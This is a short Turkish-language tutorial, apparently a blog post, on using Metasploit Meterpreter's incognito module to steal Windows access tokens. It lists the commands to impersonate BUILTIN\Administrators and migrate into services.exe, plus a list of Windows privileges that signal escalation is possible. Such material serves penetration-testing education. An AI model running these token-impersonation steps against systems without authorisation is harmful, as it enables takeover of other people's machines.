Elde ettiğimiz oturum üzerinde yetki yükseltmeye yarayan incognito modulünden bahsedeceğim. Tokenlar aynı web cookilerine benzer. Geçici olarak bu tokenlar bizlere system ve ağlara kullanıcı adı ve şifre sunmadan her zaman erişmemize sağlar. Incognito exploit de tokenları çalar.
İki tip token vardır. Bunlar ;
Delegate tokenlar interactive’dir. Makinede oturum açmak ya da uzaktan oturum açmak gibi durumlardır.
Impersonate tokenlar non-interactive’dir. Ağ sürücüsünde ve ya domain’de oturum açmak gibi durumlardır.
Şimdi incognito modulünü meterpreter ile kullanalım
use incognito

list_tokens -g


impersonate_token BUILTIN\\Administrators

Aslında her şey iyi gözüküyor. Bir eksiğimiz daha var. Bunun için öneri gereği serivices.exe’ye migrate uygulamak.
ps
Tüm processler listelenir.

migrate 668

whoami 🙂

Ek bilgiler:
whoami /priv
SeImpersonatePrivilege
SeAssignPrimaryPrivilege
SeTcbPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeCreateTokenPrivilege
SeLoadDriverPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
komut çıktısından sonra yukarıdakilerin state(durumlarında) enable görürsek yetki yükseltme yapabiliriz.(düşük yetkili kullanıcı için söylüyorum)
Daha fazla bilgi için: https://www.offensive-security.com/metasploit-unleashed/fun-incognito/